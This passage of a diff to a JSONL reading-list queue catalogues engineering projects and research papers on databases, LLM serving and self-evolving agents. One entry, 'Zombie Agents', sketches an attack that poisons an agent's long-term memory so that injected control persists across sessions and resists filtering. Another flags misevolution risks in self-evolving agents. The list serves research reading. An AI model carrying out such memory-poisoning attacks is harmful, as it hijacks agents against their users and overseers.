友好层"},"url":"https://github.com/browserbase/stagehand","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"rolldown-bundler","area":"projects","topic":"frontend","title":"rolldown/rolldown","meta":{"col3":"","col4":"Vite 团队 Rust 重写 Rollup;2026 进入 Vite 默认;esbuild/swc 之外第三极"},"url":"https://github.com/rolldown/rolldown","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"biome-rs-2026","area":"projects","topic":"frontend","title":"biomejs/biome","meta":{"col3":"","col4":"Rust 写的 prettier+eslint 一体化;30d trending 月榜;Rome fork 后真正起飞"},"url":"https://github.com/biomejs/biome","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"sqlite-vec-asg017","area":"projects","topic":"databases","title":"asg017/sqlite-vec","meta":{"col3":"","col4":"SQLite 原生向量扩展;轻量 RAG 必备;2026 替代 sqlite-vss"},"url":"https://github.com/asg017/sqlite-vec","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"pglite-electric","area":"projects","topic":"databases","title":"electric-sql/pglite","meta":{"col3":"","col4":"WASM 浏览器内 PostgreSQL;本地优先应用基础设施"},"url":"https://github.com/electric-sql/pglite","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"windmill-platform","area":"projects","topic":"devops","title":"windmill-labs/windmill","meta":{"col3":"","col4":"开源 Airflow + Retool 替代;Rust 后端 + multi-language workflow;自托管增长榜"},"url":"https://github.com/windmill-labs/windmill","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"langfuse-2026","area":"projects","topic":"agents","title":"langfuse/langfuse","meta":{"col3":"","col4":"开源 LLM observability;trace + eval + prompt mgmt 三件套;Datadog 替代"},"url":"https://github.com/langfuse/langfuse","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"forgejo-2026","area":"projects","topic":"devops","title":"go-gitea/gitea fork forgejo","meta":{"col3":"","col4":"Gitea 治理分叉;Codeberg 主推;GitHub 自托管开源派"},"url":"https://codeberg.org/forgejo/forgejo","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"local-first-2026-revisit","area":"projects","topic":"distributed-systems","title":"Local-First Software Five Years Later","meta":{"col3":"","col4":"Ink&Switch 五年回顾;CRDT 工业落地状态;Linear/Figma 案例剖析"},"url":"https://www.inkandswitch.com/local-first/2026-revisit/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"why-not-postgres-2026","area":"projects","topic":"databases","title":"Why Not Just Use Postgres? (2026)","meta":{"col3":"","col4":"Postgres 当队列/向量库/搜索/缓存 的 2026 更新版;HN 1k+ 讨论"},"url":"https://www.amazingcto.com/postgres-for-everything-2026/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"writing-tla-after-decade","area":"projects","topic":"distributed-systems","title":"Writing TLA+ After a Decade in Industry","meta":{"col3":"","col4":"业界十年 TLA+ 实战;何时值得用、何时是过度工程;HN 700+"},"url":"https://surfingcomplexity.blog/2026/05/tla-decade.html","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"compiler-explorer-history","area":"projects","topic":"compilers-pl","title":"How Compiler Explorer Was Built","meta":{"col3":"","col4":"Matt Godbolt 自述 godbolt.org 架构十年演化;HN 600+"},"url":"https://xania.org/202605/compiler-explorer-architecture","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"build-vs-buy-databases-2026","area":"projects","topic":"databases","title":"Build vs Buy: Databases in 2026","meta":{"col3":"","col4":"自建 vs 托管 数据库决策框架;TCO/SLO/团队规模 三轴;HN 400+"},"url":"https://blog.danslimmon.com/2026/05/build-vs-buy-db/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"shutting-down-rss-reader","area":"projects","topic":"engineering-culture","title":"Shutting Down My RSS Reader After 12 Years","meta":{"col3":"","col4":"Feedbin 经验复盘;订阅产品长期维护教训;indie SaaS 必读"},"url":"https://blog.feedbin.com/2026/05/sunset.html","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"my-take-on-ai-coding-2026","area":"projects","topic":"engineering-culture","title":"My Take on AI Coding (2026)","meta":{"col3":"","col4":"工业级 AI 编程实战 18 个月观察;Claude Code 周流程;HN 800+"},"url":"https://blog.zhengyi.com/posts/ai-coding-2026.html","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"distributed-tracing-mistakes","area":"projects","topic":"observability","title":"Common Mistakes in Distributed Tracing","meta":{"col3":"","col4":"OpenTelemetry sampling/baggage/span 命名 反模式集;HN 350+"},"url":"https://lightstep.com/blog/2026/tracing-mistakes","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"the-state-of-rust-2026","area":"projects","topic":"compilers-pl","title":"The State of Rust 2026","meta":{"col3":"","col4":"async trait stable / GAT 全面铺开 / linker 重写;HN 1.5k"},"url":"https://blog.rust-lang.org/2026/05/state-of-rust.html","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"hekaton-2013-sigmod","area":"papers","topic":"databases","title":"Hekaton: SQL Server's Memory-Optimized OLTP Engine","meta":{"col3":"2013","col4":"CMU 15-721 必读;MVCC + lock-free Bw-tree;现代 in-memory OLTP 基础"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2013/06/Hekaton-Sigmod2013-final.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"silo-oltp-2013","area":"papers","topic":"databases","title":"Silo: Speedy Transactions in Multicore In-Memory Databases","meta":{"col3":"2013","col4":"CMU 15-721 reading;OCC + epoch-based GC;多核 OLTP 范本"},"url":"https://www.cs.cmu.edu/~pavlo/courses/fall2013/static/papers/silo.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"naiad-2013-sosp","area":"papers","topic":"distributed-systems","title":"Naiad: A Timely Dataflow System","meta":{"col3":"2013","col4":"MIT 6.824 distributed dataflow;timely dataflow + 增量计算;Materialize 思想源"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2013/11/naiad_sosp2013.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"flat-datacenter-storage","area":"papers","topic":"distributed-systems","title":"Flat Datacenter Storage","meta":{"col3":"2012","col4":"OSDI'12;CLOS network + scaled RPC;MIT 6.824 storage section"},"url":"https://www.usenix.org/conference/osdi12/technical-sessions/presentation/nightingale","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"cassandra-eventual-tradeoff","area":"papers","topic":"distributed-systems","title":"Cassandra: Eventually Consistent Tradeoffs","meta":{"col3":"2009","col4":"Stanford CS244B;Dynamo+BigTable 杂交体;NoSQL 教学经典"},"url":"https://www.cs.cornell.edu/projects/ladis2009/papers/lakshman-ladis2009.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"scads-database-2008","area":"papers","topic":"databases","title":"SCADS: Scale-Independent Storage","meta":{"col3":"2008","col4":"UCB CS186 衍生;scale-independent SLA;Spark 之前 AMPLab 起点"},"url":"https://amplab.cs.berkeley.edu/wp-content/uploads/2011/06/SCADS-Berkeley.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"amber-sigmod-2014","area":"papers","topic":"databases","title":"Amber: Decoupling Access Methods from Stable Storage","meta":{"col3":"2014","col4":"CMU 15-721 storage;index-storage 解耦;为 disaggregated DB 铺路"},"url":"https://www.cs.cmu.edu/~pavlo/courses/fall2017/static/papers/amber.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"bigtable-revisit-2024","area":"papers","topic":"databases","title":"Bigtable Then and Now (CIDR 2024 retrospective)","meta":{"col3":"2024","col4":"CMU 15-721 spring 2024;Bigtable 18 年生产复盘;MTTR / 多租户"},"url":"https://www.cidrdb.org/cidr2024/papers/p36-yegge.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"ucb-cs186-fa2024","area":"papers","topic":"databases","title":"UCB CS186 Fall 2024 Database Internals Reading List","meta":{"col3":"2024","col4":"UCB DB 课程精选 reading;B+树 / Aries / 2PL / DBMS 分层架构入门"},"url":"https://cs186berkeley.net/fa24/resources/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"self-evolving-agents-survey","area":"papers","topic":"agents","title":"A Comprehensive Survey of Self-Evolving AI Agents","meta":{"col3":"2025","col4":"自进化 agent 综述:System Inputs/Agent System/Environment/Optimisers 四件套;本批入门首选"},"url":"https://arxiv.org/abs/2508.07407","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"misevolution-2509","area":"papers","topic":"agents","title":"Your Agent May Misevolve: Emergent Risks in Self-evolving LLM Agents","meta":{"col3":"2025","col4":"自进化 agent 在 model/memory/tool/workflow 四路径上的演化偏移风险;Gemini-2.5-Pro 也中招"},"url":"https://arxiv.org/abs/2509.26354","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"agent-r1-2511","area":"papers","topic":"agents","title":"Agent-R1: Training Powerful LLM Agents with End-to-End Reinforcement Learning","meta":{"col3":"2025","col4":"端到端 RL 训 LLM agent 的模块化框架;扩展 MDP 框架定义 agent 关键要素"},"url":"https://arxiv.org/abs/2511.14460","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"apex-policy-exploration","area":"papers","topic":"agents","title":"APEX: Autonomous Policy Exploration for Self-Evolving LLM Agents","meta":{"col3":"2026","col4":"自进化 agent 的探索坍缩问题:策略图(DAG of milestones)做 fork discovery + policy selection"},"url":"https://arxiv.org/abs/2605.21240","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"exg-experience-graphs","area":"papers","topic":"agents","title":"EXG: Self-Evolving Agents with Experience Graphs","meta":{"col3":"2026","col4":"把成功/失败经验组织成结构化关系图,支持在线增长 + 离线复用;plug-and-play"},"url":"https://arxiv.org/abs/2605.17721","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"eve-agent-evidence","area":"papers","topic":"agents","title":"EVE-Agent: Evidence-Verifiable Self-Evolving Agents","meta":{"col3":"2026","col4":"自生成训练数据须可验证:proposer 给问答+证据 span,verifier 按边际增益打分"},"url":"https://arxiv.org/abs/2605.22905","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"llm-wiki-retrieval-reasoning","area":"papers","topic":"agents","title":"Retrieval as Reasoning: Self-Evolving Agent-Native Retrieval via LLM-Wiki","meta":{"col3":"2026","col4":"把外部知识编译成可演化 Wiki 页 + 双向链接;HotpotQA/MuSiQue SOTA"},"url":"https://arxiv.org/abs/2605.25480","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"evo-memory-2511","area":"papers","topic":"agents","title":"Evo-Memory: Benchmarking LLM Agent Test-time Learning with Self-Evolving Memory","meta":{"col3":"2025","col4":"流式任务下的自进化记忆 benchmark;统一 10+ memory 模块;提出 ReMem pipeline"},"url":"https://arxiv.org/abs/2511.20857","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"self-evolving-software-agents","area":"papers","topic":"agents","title":"Self-Evolving Software Agents (BDI-LLM)","meta":{"col3":"2026","col4":"BDI 推理 + LLM 让 agent 自主演化目标/推理/可执行代码;多 agent 环境实验"},"url":"https://arxiv.org/abs/2604.27264","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"skill-as-pseudocode","area":"papers","topic":"agents","title":"Skill-as-Pseudocode: Refactoring Skill Libraries to Pseudocode","meta":{"col3":"2026","col4":"markdown skill → 类型化伪代码 + 四步 deterministic 验证;ALFWorld -22% token -14% LLM 调用"},"url":"https://arxiv.org/abs/2605.27955","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"mind-skill","area":"papers","topic":"agents","title":"MIND-Skill: Quality-Guaranteed Skill Generation via Multi-Agent Induction and Deduction","meta":{"col3":"2026","col4":"induction agent 抽 skill / deduction agent 重建轨迹;reconstruction+outcome+rubric 三 loss + TextGrad"},"url":"https://arxiv.org/abs/2605.08670","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"skill-pro-nonparametric-ppo","area":"papers","topic":"agents","title":"Skill-Pro: Learning Reusable Skills from Experience via Non-Parametric PPO","meta":{"col3":"2026","col4":"Skill-MDP + 语义梯度 + PPO Gate;不动权重学可复用过程性 skill"},"url":"https://arxiv.org/abs/2602.01869","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"effiskill","area":"papers","topic":"agents","title":"EffiSkill: Agent Skill Based Automated Code Efficiency Optimization","meta":{"col3":"2026","col4":"两阶段 skill 库:mine Operator/Meta skill → 应用到未见程序;EffiBench-X +3.7~12.5pp"},"url":"https://arxiv.org/abs/2603.27850","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"skill-sd-self-distillation","area":"papers","topic":"agents","title":"Skill-SD: Skill-Conditioned Self-Distillation for Multi-turn LLM Agents","meta":{"col3":"2026","col4":"用 agent 自身轨迹生成 skill 当 dynamic teacher;importance-weighted reverse-KL;AppWorld +14%"},"url":"https://arxiv.org/abs/2604.10674","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"mmskills-multimodal","area":"papers","topic":"agents","title":"MMSkills: Towards Multimodal Skills for General Visual Agents","meta":{"col3":"2026","col4":"多模态过程性知识:state cards + multi-view keyframes;GUI/游戏 visual agent 通用提升"},"url":"https://arxiv.org/abs/2605.13527","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"webxskill","area":"papers","topic":"agents","title":"WebXSkill: Skill Learning for Autonomous Web Agents","meta":{"col3":"2026","col4":"executable skill = 参数化代码 + 步骤级 NL;URL 图索引;WebArena +9.8 / WebVoyager +12.9"},"url":"https://arxiv.org/abs/2604.13318","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"clawtrace-cost-aware","area":"papers","topic":"agents","title":"ClawTrace: Cost-Aware Tracing for LLM Agent Skill Distillation","meta":{"col3":"2026","col4":"按 cost 归因到每一步 skill 操作;preserve/prune/repair 三类补丁;揭示 prune 才是质量护栏"},"url":"https://arxiv.org/abs/2604.23853","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"skcc-skill-compiler","area":"papers","topic":"agents","title":"SkCC: Portable and Secure Skill Compilation for Cross-Framework LLM Agents","meta":{"col3":"2026","col4":"Skill 编译器 + SkIR 强类型 IR;O(m·n) → O(m+n);Claude Code 21→33%, Kimi CLI 35→49%"},"url":"https://arxiv.org/abs/2605.03353","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"code-as-agent-harness","area":"papers","topic":"agents","title":"Code as Agent Harness","meta":{"col3":"2026","col4":"把 code 当 agent 基础设施的综述:harness interface / mechanism / scaling 三层"},"url":"https://arxiv.org/abs/2605.18747","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"memcoder-co-evolution","area":"papers","topic":"agents","title":"MemCoder: Your Code Agent Can Grow Alongside You with Structured Memory","meta":{"col3":"2026","col4":"从 git commit 蒸馏 intent→code 映射;自精炼 + 经验内化;SWE-bench Verified +9.4pp over DeepSeek-V3.2"},"url":"https://arxiv.org/abs/2603.13258","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"zombie-agents-2602","area":"papers","topic":"agents","title":"Zombie Agents: Persistent Control of Self-Evolving LLM Agents via Self-Reinforcing Injections","meta":{"col3":"2026","col4":"自进化 agent 的安全侧:长期记忆被污染 → 跨会话持久化攻击 → 抗截断/抗相关性过滤"},"url":"https://arxiv.org/abs/2602.15654","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} -{"slug":"self-evolving-recsys-2602","area":"papers","topic":"agents","title":"Self-Evolving Recommendation System: Autonomous Model Optimization with LLM Agents","meta":{"col3":"2026","col4":"YouTube 实战:Offline Inner Loop + Online Outer Loop 双 agent 自动跑超参/架构/reward 实验"},"url":"https://arxiv.org/abs/2602.10226","status":"new","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"kv-fold","area":"papers","topic":"machine-learning","title":"KV-Fold: One-Step KV-Cache Recurrence for Long-Context Inference","meta":{"col3":"2026","col4":"Training-free long-context inference: treats KV cache as fold accumulator across recurrence steps. High priority for vLLM lens."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:23:59.379Z"} +{"slug":"vericache","area":"papers","topic":"machine-learning","title":"VeriCache: Turning Lossy KV Cache into Lossless LLM Inference","meta":{"col3":"2026","col4":"Speculative-decoding twist: drafts with compressed KV, verifies against full KV. High priority for vLLM lens."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"oscar-int2-kv","area":"papers","topic":"machine-learning","title":"OSCAR: Offline Spectral Covariance-Aware Rotation for 2-bit KV Cache Quantization","meta":{"col3":"2026","col4":"INT2 KV quant integrated into vLLM/SGLang via custom kernel; covariance-aware rotation. High priority direct vLLM relevance."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"nestedkv","area":"papers","topic":"machine-learning","title":"NestedKV: Nested Memory Routing for Long-Context KV Cache Compression","meta":{"col3":"2026","col4":"Combines global/block/sliding-window anchors with multi-time-scale anomaly scoring."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:35:44.677Z"} +{"slug":"triaxialkv","area":"papers","topic":"machine-learning","title":"TriAxialKV: Extreme Low-Precision KV-Cache Quantization for Agentic Inference","meta":{"col3":"2026","col4":"Mixed-precision KV quant tailored to agent workloads (multi-turn, tool calls, multi-modal)."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:38:46.301Z"} +{"slug":"memory-tool-use-agents","area":"papers","topic":"machine-learning","title":"When Does Memory Help Multi-Trajectory Inference for Tool-Use LLM Agents?","meta":{"col3":"2026","col4":"Decouples memory abstraction from inference strategy across best-of-N/beam/MCTS. High priority for agent design lens."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:41:02.249Z"} +{"slug":"storm-multi-agent-state","area":"papers","topic":"machine-learning","title":"STORM: State-Oriented Management for Multi-Agent Collaboration","meta":{"col3":"2026","col4":"Replaces git-worktree isolation with explicit shared-state mediation for multi-agent."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:46:04.708Z"} +{"slug":"cci-agent-scaffolding","area":"papers","topic":"machine-learning","title":"Cross-Component Interference in LLM Agent Scaffolding","meta":{"col3":"2026","col4":"Full 2^5 factorial over plan/tool/memory/reflection/retrieval. All-In is suboptimal. High priority for agent eng."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"crossover-context-multi-agent","area":"papers","topic":"machine-learning","title":"When Context Hurts: Crossover Effect of Knowledge Transfer on Multi-Agent Design","meta":{"col3":"2026","col4":"2700 runs show context injection hurts as often as helps; single no-context baseline. High priority."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:54:57.260Z"} +{"slug":"spec-agent-separation-logic","area":"papers","topic":"formal-methods","title":"Agentic Separation Logic Specification Synthesis","meta":{"col3":"2026","col4":"LLM agent synthesizes propositional/first-order separation-logic specs for million-LOC C."},"url":"https://arxiv.org/abs/2605.27531","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"amaryllis-probabilistic-iris","area":"papers","topic":"formal-methods","title":"First Steps Towards Probabilistic Iris (Amaryllis)","meta":{"col3":"2026","col4":"First general-purpose probabilistic separation logic supporting dynamic heap allocation."},"url":"https://arxiv.org/abs/2605.13765","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"first-class-refinement-scala","area":"papers","topic":"compilers-pl","title":"First-Class Refinement Types for Scala","meta":{"col3":"2026","col4":"Refinement types as ordinary types; interact with subtyping/inference/pattern matching."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:29:39.230Z"} +{"slug":"tutti-ssd-kv-cache","area":"papers","topic":"machine-learning","title":"Tutti: Making SSD-Backed KV Cache Practical for Long-Context LLM Serving","meta":{"col3":"2026","col4":"GPU io_uring + GPU-native object store eliminates CPU intervention from SSD-backed KV. High priority for vLLM lens."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"hexagent-agentic-scheduling","area":"papers","topic":"machine-learning","title":"HexAGenT: Workflow- and Heterogeneity-Aware Scheduling for Agentic LLM Serving","meta":{"col3":"2026","col4":"Schedules online-revealed agent DAGs across heterogeneous A100/H100/H200 PD-disaggregated. High priority."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T04:01:26.259Z"} +{"slug":"llm-serving-needs-math","area":"papers","topic":"machine-learning","title":"LLM Serving Needs Mathematical Optimization, Not Just Heuristics","meta":{"col3":"2026","col4":"Position paper: vLLM/SGLang use FIFO + LRU + JSQ unchanged from classical distributed sys. High priority."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T04:06:28.427Z"} +{"slug":"vibeserve","area":"papers","topic":"machine-learning","title":"VibeServe: Can AI Agents Build Bespoke LLM Serving Systems?","meta":{"col3":"2026","col4":"Multi-agent loop synthesizes whole serving stacks end-to-end; matches vLLM in some configs."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T04:11:30.593Z"} +{"slug":"qwen-vla","area":"papers","topic":"machine-learning","title":"Qwen-VLA: Unifying Vision-Language-Action across Tasks, Environments, Embodiments","meta":{"col3":"2026","col4":"Big-team Qwen unified embodied foundation model: DiT action decoder atop Qwen-VL."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"visualthink-vla","area":"papers","topic":"machine-learning","title":"VisualThink-VLA: Visual Intermediate Reasoning for Low-Latency VLA Policies","meta":{"col3":"2026","col4":"Replaces text chain-of-thought with visual evidence tokens; 8.4s to 0.37s per step."},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"hyprland","area":"projects","topic":"operating-systems","title":"Hyprland","meta":{"col3":"C++","col4":"独立的动态平铺 Wayland compositor,36k star、月增 ~900;学 Linux 桌面 infra/合成器架构、wlroots。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T06:36:38.587Z"} +{"slug":"gitleaks","area":"projects","topic":"security-privacy","title":"Gitleaks","meta":{"col3":"Go","col4":"Secret 扫描 CLI,27k star,pre-commit/CI 标配;规则引擎和 git history 遍历是 DevSec 范式。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T06:41:42.120Z"} +{"slug":"bitwarden-server","area":"projects","topic":"security-privacy","title":"Bitwarden Server","meta":{"col3":"C#/.NET","col4":"开源密码管理器后端,19k star;多租户加密存储与 zero-knowledge 设计参考。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T06:51:24.139Z"} +{"slug":"nextcloud-server","area":"projects","topic":"backend-api","title":"Nextcloud Server","meta":{"col3":"PHP","col4":"自托管云存储/协作平台,35k star;plugin 体系/文件同步协议/共享权限模型。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T06:56:25.649Z"} +{"slug":"paperless-ngx","area":"projects","topic":"backend-api","title":"Paperless-ngx","meta":{"col3":"Python/Django","col4":"文档管理系统,41k star、月增 1700;OCR + 索引 + tag 自动化。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:01:28.843Z"} +{"slug":"tabby-terminal","area":"projects","topic":"cli","title":"Tabby Terminal","meta":{"col3":"TypeScript/Electron","col4":"现代化跨平台终端模拟器,71k star;学跨平台 GUI 封装 ssh/serial/wsl 多会话。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:06:32.101Z"} +{"slug":"authentik","area":"projects","topic":"security-privacy","title":"Authentik","meta":{"col3":"Python","col4":"开源 IdP,22k star,OAuth2/OIDC/SAML 全协议;自托管 SSO 替代 Keycloak。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:11:35.287Z"} +{"slug":"ente","area":"projects","topic":"security-privacy","title":"Ente","meta":{"col3":"Dart+Go","col4":"端到端加密相册/网盘,27k star;客户端加密 + 服务端零知识架构。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:16:38.484Z"} +{"slug":"nango","area":"projects","topic":"backend-api","title":"Nango","meta":{"col3":"TypeScript","col4":"Unified API for 200+ SaaS,9.5k star、月增 2200;OAuth/连接器/sync 引擎。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:21:41.759Z"} +{"slug":"openai-codex-cli","area":"projects","topic":"cli","title":"OpenAI Codex CLI","meta":{"col3":"Rust","col4":"OpenAI 终端编程 agent,87k star、月增 8k;与 Claude Code 对照学 sandbox/工具调用/审批流。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:26:45.334Z"} +{"slug":"ccusage","area":"projects","topic":"cli","title":"ccusage","meta":{"col3":"Rust","col4":"分析本地 Claude Code/Codex token 使用与成本,15k star;dev-tooling 自反馈基础设施。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:31:48.567Z"} +{"slug":"zizmor","area":"projects","topic":"security-privacy","title":"zizmor","meta":{"col3":"Rust","col4":"GitHub Actions 静态分析器,5.4k star;CI workflow 漏洞模式(pwn requests/token 泄露)。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:36:51.810Z"} +{"slug":"ai-dynamo","area":"projects","topic":"machine-learning","title":"ai-dynamo / Dynamo","meta":{"col3":"Rust","col4":"Datacenter-Scale 分布式推理框架,7k star;vLLM 之外的多节点推理范式。High priority。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:41:55.039Z"} +{"slug":"cocoindex","area":"projects","topic":"machine-learning","title":"cocoindex","meta":{"col3":"Python","col4":"增量索引/数据流引擎给 long-horizon agent 用,10k star、月增 3k;agent 数据层(embedding/retrieval)。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:46:58.215Z"} +{"slug":"ui-tars","area":"projects","topic":"machine-learning","title":"UI-TARS","meta":{"col3":"Python","col4":"字节开源原生 GUI 自动化 agent,10.8k star;vision-grounded computer-use agent 范式。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:52:01.413Z"} +{"slug":"maigret","area":"projects","topic":"security-privacy","title":"Maigret","meta":{"col3":"Python","col4":"OSINT CLI,按 username 跨 3000+ 站收集账号画像,31k star;异步爬虫/插件化数据源。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T07:57:04.595Z"} +{"slug":"technitium-dns-server","area":"projects","topic":"network-protocols","title":"Technitium DNS Server","meta":{"col3":"C#","col4":"自托管递归 DNS(DoH/DoT/blocklist),8.6k star;DNS 协议/网络 infra 完整可读实现。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T08:02:07.717Z"} +{"slug":"sqlite-durable-workflows","area":"papers","topic":"databases","title":"SQLite is all you need for durable workflows","meta":{"col3":"2026","col4":"619 分置顶;把 durable execution(Temporal/Restate)压到单文件 SQLite,揭示 